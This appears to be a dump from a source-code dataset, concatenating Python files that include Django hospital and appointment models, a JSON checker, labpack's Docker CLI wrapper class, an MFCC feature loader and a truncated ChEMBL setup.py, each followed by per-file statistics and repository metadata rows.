    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    slug = models.SlugField(unique=True, null=True, blank=True)
    # rating is constrained to the range 1-5
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$',
                                 message="Phone number must be entered in the format:"
                                         " '+919999999999'.")
    email = models.EmailField(blank=True, help_text="Please enter valid email address, it will be used for "
                                                    "verification.")
    phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True, help_text="Please enter "
                                                                                                   "valid phone "
                                                                                                   "number.")
    specialisation = models.ManyToManyField(Specialisation, related_name='speciality_of_hospital')
    verified = models.BooleanField(default=False)

    def __str__(self):
        return self.user.first_name

    def get_url(self):
        # resolve the public overview page for this hospital
        return reverse('hospital:overview', args=[self.slug])

    def get_all_spec(self):
        # comma-separated specialisation names; [:-2] strips the trailing ", "
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]
class Doctor(models.Model):
    # doctor account profile, attached to a hospital

    class Meta:
        ordering = ('name',)
        verbose_name = 'Doctor'
        verbose_name_plural = 'Doctors'

    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    slug = models.SlugField(unique=True, null=True, blank=True)
    # rating is constrained to the range 1-5
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    hospital = models.ForeignKey(Hospital, related_name='doctor', on_delete=models.CASCADE)
    specialisation = models.ManyToManyField(Specialisation, related_name='speciality')

    def __str__(self):
        return self.name

    def get_url(self):
        # resolve the doctor's landing page
        return reverse('hospital:doctor-home', args=[self.slug])

    def get_all_spec(self):
        # comma-separated specialisation names; [:-2] strips the trailing ", "
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]
class Appointment(models.Model):
    # a booking between a patient Profile and a Doctor

    class Meta:
        ordering = ('-start_date',)
        verbose_name = 'Appointment'
        verbose_name_plural = 'Appointments'

    # uuid4 primary key stored as a non-editable text field
    id = models.CharField(unique=True, default=uuid.uuid4,
                          editable=False, max_length=50, primary_key=True)
    doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True)
    patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
    start_date = models.DateTimeField(blank=True, null=True,
                                      help_text="You can choose dates from now")
    end_date = models.DateTimeField(blank=True, null=True,
                                    help_text="You can choose appointment "
                                              "duration as maximum of 7 days")
    patients_remarks = models.TextField(blank=True, null=True)
    doctors_remarks = models.TextField(blank=True, null=True)
    approved = models.BooleanField(default=False)
    rejected = models.BooleanField(default=False)
    rejection_cause = models.TextField(max_length=20000, blank=True, null=True)

    def __str__(self):
        # NOTE(review): raises AttributeError when doctor or patient is NULL
        # (both FKs allow null) -- confirm intended
        return str(self.doctor.name + "-" + self.patient.user.first_name)

    def get_start_date(self):
        return self.start_date.date()

    def get_end_date(self):
        return self.end_date.date()
| 39.305785 | 114 | 0.625526 | 518 | 4,756 | 5.596525 | 0.258687 | 0.035874 | 0.028976 | 0.035185 | 0.595033 | 0.5188 | 0.483615 | 0.38565 | 0.359434 | 0.359434 | 0 | 0.016157 | 0.271236 | 4,756 | 120 | 115 | 39.633333 | 0.820254 | 0 | 0 | 0.43299 | 0 | 0 | 0.093566 | 0.004626 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103093 | false | 0 | 0.061856 | 0.082474 | 0.649485 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413d8e7168ec81d7fbf240777114a40652b16b3b | 409 | py | Python | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | anno-search-crawler/checker.py | powerslider/anno-search | b47ae5b4077d75622e088d3064e61934a8a3cf37 | [
"Apache-2.0"
] | null | null | null | import os
import json
# Scan extracted JSON files and report any with empty "entities" or "text".
json_files = set()
errors = set()
json_dir = "extracted/json/"  # renamed from 'dir' to avoid shadowing the builtin
# guard against a missing extraction directory instead of crashing on listdir
file_names = os.listdir(json_dir) if os.path.isdir(json_dir) else []
for file_name in file_names:
    # endswith avoids matching names that merely contain ".json" mid-string
    if file_name.endswith(".json"):
        json_files.add(file_name)
        with open(os.path.join(json_dir, file_name), "r") as f:
            # json.load reads the stream directly; the original
            # "".join(f.read()) was a no-op on an already-read string
            j = json.load(f)
            if j["entities"] == {} or j["text"] == "":
                errors.add(file_name)
print(errors or "All good. Scanned files: " + str(len(json_files)))
| 22.722222 | 67 | 0.545232 | 59 | 409 | 3.728814 | 0.542373 | 0.122727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.278729 | 409 | 17 | 68 | 24.058824 | 0.745763 | 0 | 0 | 0 | 0 | 0 | 0.141809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413ea01cee609cb192107f94528569476162e9b2 | 29,112 | py | Python | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | 2 | 2017-06-20T15:20:46.000Z | 2019-11-18T01:28:49.000Z | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | null | null | null | labpack/platforms/docker.py | collectiveacuity/labPack | c8fb0d1ee23608f6dbcb99c232373eee886000fd | [
"MIT"
] | null | null | null | __author__ = 'rcj1492'
__created__ = '2016.03'
__license__ = 'MIT'
from labpack.handlers.requests import requestsHandler
class dockerClient(requestsHandler):
_class_fields = {
'schema': {
'virtualbox_name': '',
'container_alias': '',
'image_name': '',
'image_tag': '',
'image_id': '',
'sys_command': '',
'environmental_variables': {},
'envvar_key': '',
'envvar_value': '',
'mapped_ports': {},
'port_key': '1000',
'port_value': '1000',
'mounted_volumes': {},
'mount_field': '',
'start_command': '',
'network_name': '',
'run_flags': ''
},
'components': {
'.envvar_key': {
'must_contain': [ '^[a-zA-Z_][a-zA-Z0-9_]+$' ],
'max_length': 255
},
'.envvar_value': {
'max_length': 32767
},
'.port_key': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
},
'.port_value': {
'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ]
}
}
}
    def __init__(self, virtualbox_name='', verbose=False):
        '''
            a method to initialize the dockerClient class

        :param virtualbox_name: [optional] string with name of virtualbox image
        :param verbose: [optional] boolean to print progress dots to stdout
        :return: dockerClient object
        '''
        title = '%s.__init__' % self.__class__.__name__
        # construct super
        super(dockerClient, self).__init__()
        # construct fields model
        from jsonmodel.validators import jsonModel
        self.fields = jsonModel(self._class_fields)
        # validate inputs
        input_fields = {
            'virtualbox_name': virtualbox_name
        }
        for key, value in input_fields.items():
            if value:
                object_title = '%s(%s=%s)' % (title, key, str(value))
                self.fields.validate(value, '.%s' % key, object_title)
        # construct properties
        self.vbox = virtualbox_name
        self.verbose = verbose
        # construct localhost
        from labpack.platforms.localhost import localhostClient
        self.localhost = localhostClient()
        # verbosity
        if self.verbose:
            print('Checking docker installation...', end='', flush=True)
        # validate docker installation
        self._validate_install()
        if self.verbose:
            print('.', end='', flush=True)
        # validate virtualbox installation (only relevant on Win 7/8)
        self.vbox_running = self._validate_virtualbox()
        if self.verbose:
            print('.', end='', flush=True)
        # set virtualbox variables
        if self.vbox_running:
            self._set_virtualbox()
            if self.verbose:
                print('.', end='', flush=True)
        if self.verbose:
            print(' done.')
def _validate_install(self):
''' a method to validate docker is installed '''
from subprocess import check_output, STDOUT
sys_command = 'docker --help'
try:
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
# call(sys_command, stdout=open(devnull, 'wb'))
except Exception as err:
raise Exception('"docker" not installed. GoTo: https://www.docker.com')
return True
    def _validate_virtualbox(self):
        '''
            a method to validate that virtualbox is running on Win 7/8 machines

        :return: boolean indicating whether virtualbox is running
        '''
        # validate operating system (only Win releases below 10 need virtualbox)
        if self.localhost.os.sysname != 'Windows':
            return False
        win_release = float(self.localhost.os.release)
        if win_release >= 10.0:
            return False
        # validate docker-machine installation
        from os import devnull
        from subprocess import call, check_output, STDOUT
        sys_command = 'docker-machine --help'
        try:
            check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
        except Exception as err:
            raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com')
        # validate virtualbox is running
        sys_command = 'docker-machine status %s' % self.vbox
        try:
            vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '')
        except Exception as err:
            # tailor the error to whether a vbox name was given at all
            if not self.vbox:
                raise Exception('Docker requires VirtualBox to run on Win7/8. GoTo: https://www.virtualbox.org')
            elif self.vbox == "default":
                raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.')
            else:
                raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox)
        if 'Stopped' in vbox_status:
            raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox))
        return True
    def _set_virtualbox(self):
        '''
            a method to set virtualbox environment variables for docker-machine

        :return: True
        '''
        from os import environ
        # only populate the env vars when docker-machine has not already done so
        if not environ.get('DOCKER_CERT_PATH'):
            import re
            sys_command = 'docker-machine env %s' % self.vbox
            cmd_output = self.command(sys_command)
            variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME']
            for variable in variable_list:
                # each variable appears in the env output as: VAR="value"
                env_start = '%s="' % variable
                env_end = '"\\n'
                env_regex = '%s.*?%s' % (env_start, env_end)
                env_pattern = re.compile(env_regex)
                env_statement = env_pattern.findall(cmd_output)
                # strip the VAR=" prefix and the trailing quote + newline
                env_var = env_statement[0].replace(env_start, '').replace('"\n', '')
                environ[variable] = env_var
        return True
def _images(self, sys_output):
''' a helper method for parsing docker image output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
image_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
if len(columns) == len(column_headers):
image_details = {}
for j in range(len(columns)):
image_details[column_headers[j]] = columns[j]
image_list.append(image_details)
return image_list
def _ps(self, sys_output):
''' a helper method for parsing docker ps output '''
import re
gap_pattern = re.compile('\t|\s{2,}')
container_list = []
output_lines = sys_output.split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
container_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
container_details[column_headers[j]] = ''
if j <= len(columns) - 1:
container_details[column_headers[j]] = columns[j]
# stupid hack for possible empty port column
if container_details['PORTS'] and not container_details['NAMES']:
from copy import deepcopy
container_details['NAMES'] = deepcopy(container_details['PORTS'])
container_details['PORTS'] = ''
container_list.append(container_details)
return container_list
def _synopsis(self, container_settings, container_status=''):
''' a helper method for summarizing container settings '''
# compose default response
settings = {
'container_status': container_settings['State']['Status'],
'container_exit': container_settings['State']['ExitCode'],
'container_ip': container_settings['NetworkSettings']['IPAddress'],
'image_name': container_settings['Config']['Image'],
'container_alias': container_settings['Name'].replace('/',''),
'container_variables': {},
'mapped_ports': {},
'mounted_volumes': {},
'container_networks': []
}
# parse fields nested in container settings
import re
num_pattern = re.compile('\d+')
if container_settings['NetworkSettings']['Ports']:
for key, value in container_settings['NetworkSettings']['Ports'].items():
if value:
port = num_pattern.findall(value[0]['HostPort'])[0]
settings['mapped_ports'][port] = num_pattern.findall(key)[0]
elif container_settings['HostConfig']['PortBindings']:
for key, value in container_settings['HostConfig']['PortBindings'].items():
port = num_pattern.findall(value[0]['HostPort'])[0]
settings['mapped_ports'][port] = num_pattern.findall(key)[0]
if container_settings['Config']['Env']:
for variable in container_settings['Config']['Env']:
k, v = variable.split('=')
settings['container_variables'][k] = v
for volume in container_settings['Mounts']:
system_path = volume['Source']
container_path = volume['Destination']
settings['mounted_volumes'][system_path] = container_path
if container_settings['NetworkSettings']:
if container_settings['NetworkSettings']['Networks']:
for key in container_settings['NetworkSettings']['Networks'].keys():
settings['container_networks'].append(key)
# determine stopped status
if settings['container_status'] == 'exited':
if not container_status:
try:
from subprocess import check_output, STDOUT
sys_command = 'docker logs --tail 1 %s' % settings['container_alias']
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
settings['container_status'] = 'stopped'
except:
pass
else:
settings['container_status'] = container_status
return settings
def images(self):
'''
a method to list the local docker images
:return: list of dictionaries with available image fields
[ {
'CREATED': '7 days ago',
'TAG': 'latest',
'IMAGE ID': '2298fbaac143',
'VIRTUAL SIZE': '302.7 MB',
'REPOSITORY': 'test1'
} ]
'''
sys_command = 'docker images'
sys_output = self.command(sys_command)
image_list = self._images(sys_output)
return image_list
def ps(self):
'''
a method to list the local active docker containers
:return: list of dictionaries with active container fields
[{
'CREATED': '6 minutes ago',
'NAMES': 'flask',
'PORTS': '0.0.0.0:5000->5000/tcp',
'CONTAINER ID': '38eb0bbeb2e5',
'STATUS': 'Up 6 minutes',
'COMMAND': '"gunicorn --chdir ser"',
'IMAGE': 'rc42/flaskserver'
}]
'''
sys_command = 'docker ps -a'
sys_output = self.command(sys_command)
container_list = self._ps(sys_output)
return container_list
def network_ls(self):
'''
a method to list the available networks
:return: list of dictionaries with docker network fields
[{
'NETWORK ID': '3007476acfe5',
'NAME': 'bridge',
'DRIVER': 'bridge',
'SCOPE': 'local'
}]
'''
import re
gap_pattern = re.compile('\t|\s{2,}')
network_list = []
sys_command = 'docker network ls'
output_lines = self.command(sys_command).split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
network_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
network_details[column_headers[j]] = ''
if j <= len(columns) - 1:
network_details[column_headers[j]] = columns[j]
network_list.append(network_details)
return network_list
def inspect_container(self, container_alias):
'''
a method to retrieve the settings of a container
:param container_alias: string with name or id of container
:return: dictionary of settings of container
{ TOO MANY TO LIST }
'''
title = '%s.inspect_container' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send inspect command
import json
sys_command = 'docker inspect %s' % container_alias
output_dict = json.loads(self.command(sys_command))
container_settings = output_dict[0]
return container_settings
def inspect_image(self, image_name, image_tag=''):
'''
a method to retrieve the settings of an image
:param image_name: string with name or id of image
:param image_tag: [optional] string with tag associated with image
:return: dictionary of settings of image
{ TOO MANY TO LIST }
'''
title = '%s.inspect_image' % self.__class__.__name__
# validate inputs
input_fields = {
'image_name': image_name,
'image_tag': image_tag
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# determine system command argument
sys_arg = image_name
if image_tag:
sys_arg += ':%s' % image_tag
# run inspect command
import json
sys_command = 'docker inspect %s' % sys_arg
output_dict = json.loads(self.command(sys_command))
image_settings = output_dict[0]
return image_settings
def rm(self, container_alias):
'''
a method to remove an active container
:param container_alias: string with name or id of container
:return: string with container id
'''
title = '%s.rm' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# run remove command
sys_cmd = 'docker rm -f %s' % container_alias
output_lines = self.command(sys_cmd).split('\n')
return output_lines[0]
def rmi(self, image_id):
'''
a method to remove an image
:param image_name: string with id of image
:return: list of strings with image layers removed
'''
title = '%s.rmi' % self.__class__.__name__
# validate inputs
input_fields = {
'image_id': image_id
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send remove command
sys_cmd = 'docker rmi %s' % image_id
output_lines = self.command(sys_cmd).split('\n')
return output_lines
def ip(self):
'''
a method to retrieve the ip of system running docker
:return: string with ip address of system
'''
if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10:
sys_cmd = 'docker-machine ip %s' % self.vbox
system_ip = self.command(sys_cmd).replace('\n','')
else:
system_ip = self.localhost.ip
return system_ip
def search(self, image_name):
# run docker search
sys_command = 'docker search %s' % image_name
shell_output = self._handle_command(sys_command)
# parse table
from labpack.parsing.shell import convert_table
image_list = convert_table(shell_output)
return image_list
def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'):
# construct sys command arguments
from os import path
tag_insert = ''
if image_tag:
tag_insert = ':%s' % image_tag
path_root, path_node = path.split(dockerfile_path)
sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root)
# determine verbosity
print_pipe = False
if self.verbose:
print_pipe = True
else:
sys_command += ' -q'
# run command
shell_output = self._handle_command(sys_command, print_pipe=print_pipe)
return shell_output
def save(self, image_name, file_name, image_tag=''):
sys_command = 'docker save -o %s %s' % (file_name, image_name)
if image_tag:
sys_command += ':%s' % image_tag
return self.command(sys_command)
def command(self, sys_command):
    '''
        a method to run a system command in a separate shell

    :param sys_command: string with docker command
    :return: string output from docker
    :raises Exception: with the command's combined output if it exits non-zero
    '''

    title = '%s.command' % self.__class__.__name__

    # validate inputs
    input_fields = {
        'sys_command': sys_command
    }
    for key, value in input_fields.items():
        object_title = '%s(%s=%s)' % (title, key, str(value))
        self.fields.validate(value, '.%s' % key, object_title)

    # run command, capturing stderr alongside stdout
    from subprocess import check_output, STDOUT, CalledProcessError
    try:
        output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
    except CalledProcessError as err:
        # BUGFIX: decode failure output as utf-8 (matching the success path)
        # instead of ascii, so non-ascii characters in docker error
        # messages are preserved rather than dropped
        raise Exception(err.output.decode('utf-8', 'ignore'))
    return output
def synopsis(self, container_alias):
    '''
        a method to summarize key configuration settings required for docker compose

    :param container_alias: string with name or id of container
    :return: dictionary with values required for module configurations
    '''

    title = '%s.synopsis' % self.__class__.__name__

    # validate inputs
    for field_name, field_value in (('container_alias', container_alias),):
        object_title = '%s(%s=%s)' % (title, field_name, str(field_value))
        self.fields.validate(field_value, '.%s' % field_name, object_title)

    # retrieve container settings and condense them into a summary map
    container_settings = self.inspect_container(container_alias)
    return self._synopsis(container_settings)
def enter(self, container_alias):
    '''
        a method to open up a terminal inside a running container

    :param container_alias: string with name or id of container
    :return: None
    '''

    title = '%s.enter' % self.__class__.__name__

    # validate inputs
    input_fields = {
        'container_alias': container_alias
    }
    for key, value in input_fields.items():
        object_title = '%s(%s=%s)' % (title, key, str(value))
        self.fields.validate(value, '.%s' % key, object_title)

    # compose system command
    from os import system
    sys_cmd = 'docker exec -it %s sh' % container_alias
    # BUGFIX: the original tested `sysname in ('Windows')`, which is a
    # substring check against the string 'Windows' rather than tuple
    # membership; use a direct comparison instead
    if self.localhost.os.sysname == 'Windows':
        sys_cmd = 'winpty %s' % sys_cmd

    # open up terminal (blocks until the interactive shell exits)
    system(sys_cmd)
def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''):
    '''
        a method to start a local container

    :param image_name: string with name or id of image
    :param container_alias: string with name to assign to container
    :param image_tag: [optional] string with tag assigned to image
    :param environmental_variables: [optional] dictionary of envvar fields to add to container
    :param mapped_ports: [optional] dictionary of port fields to map to container
    :param mounted_volumes: [optional] dictionary of path fields to map to container
    :param start_command: [optional] string of command (and any arguments) to run inside container
    :param network_name: [optional] string with name of docker network to link container to
    :param run_flags: [optional] string with additional docker options to add to container
    :return: string with container id

    NOTE:   valid characters for environmental variables key names follow the shell
            standard of upper and lower alphanumerics or underscore and cannot start
            with a numerical value.

    NOTE:   ports are mapped such that the key name is the system port and the
            value is the port inside the container. both must be strings of digits.

    NOTE:   volumes are mapped such that the key name is the absolute or relative
            system path and the value is the absolute path inside the container.
            both must be strings.

    NOTE:   additional docker options:
                --entrypoint    overrides existing entrypoint command
                --rm            removes container once start command exits
                --log-driver    sets system logging settings for the container
            https://docs.docker.com/engine/reference/run
    '''

    title = '%s.run' % self.__class__.__name__

    # validate inputs (empty/None optional arguments are skipped)
    input_fields = {
        'image_name': image_name,
        'container_alias': container_alias,
        'image_tag': image_tag,
        'environmental_variables': environmental_variables,
        'mapped_ports': mapped_ports,
        'mounted_volumes': mounted_volumes,
        'start_command': start_command,
        'network_name': network_name,
        'run_flags': run_flags
    }
    for key, value in input_fields.items():
        if value:
            object_title = '%s(%s=%s)' % (title, key, str(value))
            self.fields.validate(value, '.%s' % key, object_title)

    # validate subfields and normalize None arguments to empty dicts
    if environmental_variables:
        for key, value in environmental_variables.items():
            key_title = '%s(environmental_variables={%s:...})' % (title, key)
            self.fields.validate(key, '.envvar_key', key_title)
            value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.envvar_value', value_title)
    else:
        environmental_variables = {}
    if mapped_ports:
        for key, value in mapped_ports.items():
            key_title = '%s(mapped_ports={%s:...})' % (title, key)
            self.fields.validate(key, '.port_key', key_title)
            value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.port_value', value_title)
    else:
        mapped_ports = {}
    if mounted_volumes:
        for key, value in mounted_volumes.items():
            key_title = '%s(mounted_volumes={%s:...})' % (title, key)
            self.fields.validate(key, '.mount_field', key_title)
            value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value))
            self.fields.validate(value, '.mount_field', value_title)
    else:
        mounted_volumes = {}

    # TODO verify image exists (locally or remotely) ???

    # verify alias does not exist among current containers
    for container in self.ps():
        if container['NAMES'] == container_alias:
            raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias))

    # verify network exists (only enforced when a network name was given)
    network_exists = False
    for network in self.network_ls():
        if network['NAME'] == network_name:
            network_exists = True
    if network_name and not network_exists:
        raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name))

    # verify system paths and compose absolute path mount map
    absolute_mounts = {}
    from os import path
    for key, value in mounted_volumes.items():
        if not path.exists(key):
            raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' % (title, key))
        absolute_path = path.abspath(key)
        # NOTE(review): windows paths are prefixed with a slash — presumably
        # for docker toolbox path translation; confirm against target setup
        if self.localhost.os.sysname == 'Windows':
            absolute_path = '"/%s"' % absolute_path
        else:
            absolute_path = '"%s"' % absolute_path
        absolute_mounts[absolute_path] = '"%s"' % value

    # compose run command from the validated options
    sys_cmd = 'docker run --name %s' % container_alias
    for key, value in environmental_variables.items():
        sys_cmd += ' -e %s=%s' % (key.upper(), value)
    for key, value in mapped_ports.items():
        sys_cmd += ' -p %s:%s' % (key, value)
    for key, value in absolute_mounts.items():
        sys_cmd += ' -v %s:%s' % (key, value)
    if network_name:
        sys_cmd += ' --network %s' % network_name
    if run_flags:
        sys_cmd += ' %s' % run_flags.strip()
    sys_cmd += ' -d %s' % image_name
    if image_tag:
        sys_cmd += ':%s' % image_tag
    if start_command:
        sys_cmd += ' %s' % start_command.strip()

    # run command; the first line of output is the new container id
    output_lines = self.command(sys_cmd).split('\n')
    return output_lines[0]
if __name__ == '__main__':

    # smoke-test script: requires a working docker install on localhost

    # test docker client init
    from pprint import pprint
    docker_client = dockerClient()

    # test docker list methods
    images = docker_client.images()
    print(images)
    containers = docker_client.ps()
    print(containers)
    networks = docker_client.network_ls()
    print(networks)
    remote_images = docker_client.search('alpine')
    print(remote_images)

    # # test docker run
    # from labpack.records.settings import load_settings
    # docker_config = load_settings('../../data/test_docker.yaml')
    # container_id = docker_client.run(
    #     image_name=docker_config['image_name'],
    #     container_alias=docker_config['container_alias'],
    #     environmental_variables=docker_config['envvar'],
    #     mounted_volumes=docker_config['mounts'],
    #     mapped_ports=docker_config['ports'],
    #     start_command=docker_config['command']
    # )
    # print(container_id)
    #
    # # wait for container to start
    # from time import sleep
    # sleep(1)

    # test docker synopsis on every currently-running container
    for container in containers:
        settings = docker_client.synopsis(container['CONTAINER ID'])
        pprint(settings)

    # test enter and rm from separate script
    print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
| 36.897338 | 182 | 0.561384 | 3,145 | 29,112 | 4.991097 | 0.128458 | 0.022934 | 0.012614 | 0.014907 | 0.401988 | 0.342804 | 0.288781 | 0.228069 | 0.212079 | 0.183411 | 0 | 0.006401 | 0.33457 | 29,112 | 788 | 183 | 36.944162 | 0.803892 | 0.208505 | 0 | 0.327354 | 0 | 0.002242 | 0.146633 | 0.016376 | 0 | 0 | 0 | 0.001269 | 0 | 1 | 0.049327 | false | 0.002242 | 0.049327 | 0 | 0.152466 | 0.033632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413f75cca22078b8921f0960e0731176326021d4 | 947 | py | Python | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
def load_data(dataset='training', path='../data_processed/'):
    """Load one pickled dataset split.

    :param dataset: split name, e.g. 'training' or 'test'
    :param path: directory prefix holding the '<dataset>_set.pkl' files
    :return: the unpickled pandas DataFrame
    """
    pickle_file = f"{path}{dataset}_set.pkl"
    return pd.read_pickle(pickle_file)
def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'):
    """Explode per-file coefficient matrices into one row per frame.

    :param dataset: which split to load ('training', 'test', ...)
    :param path: directory prefix holding the pickled '<dataset>_set.pkl' files
    :param target_column: column whose 2-D arrays are expanded frame-by-frame
    :return: DataFrame indexed by File_id, one column per coefficient, plus Label
    """
    df = load_data(dataset=dataset, path=path)
    labels, files, column_values = [], [], []
    for index, row in df.iterrows():
        # one output record per frame (column) of the coefficient matrix
        # BUGFIX: honor target_column instead of the hard-coded 'mfccs'
        for f in range(row[target_column].shape[1]):
            labels.append(row['Label'])
            files.append(index)
            column_values.append(row[target_column][:, f])
    df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values})
    # Here we make the lists inside the target column into independent columns,
    # while keeping the file_id and label
    features_df = pd.concat([df['column_values'].apply(pd.Series), df['File_id'], df['Label']], axis=1)
    features_df = features_df.set_index('File_id')
    return features_df
| 37.88 | 114 | 0.669483 | 134 | 947 | 4.552239 | 0.432836 | 0.098361 | 0.04918 | 0.07541 | 0.104918 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002571 | 0.178458 | 947 | 24 | 115 | 39.458333 | 0.781491 | 0.1151 | 0 | 0 | 0 | 0 | 0.16368 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.0625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414012d7a8b9a151ce80cbbbd219f43643543cf6 | 1,395 | py | Python | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | 2 | 2017-12-02T12:14:10.000Z | 2020-09-30T17:49:37.000Z | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | null | null | null | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'mnowotka'
import sys
try:
from setuptools import setup
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup
if sys.version_info < (2, 7, 3) or sys.version_info >= (2, 7, 7):
raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7')
setup(
name='chembl-assay-network',
version='0.8.1',
author='Michal Nowotka',
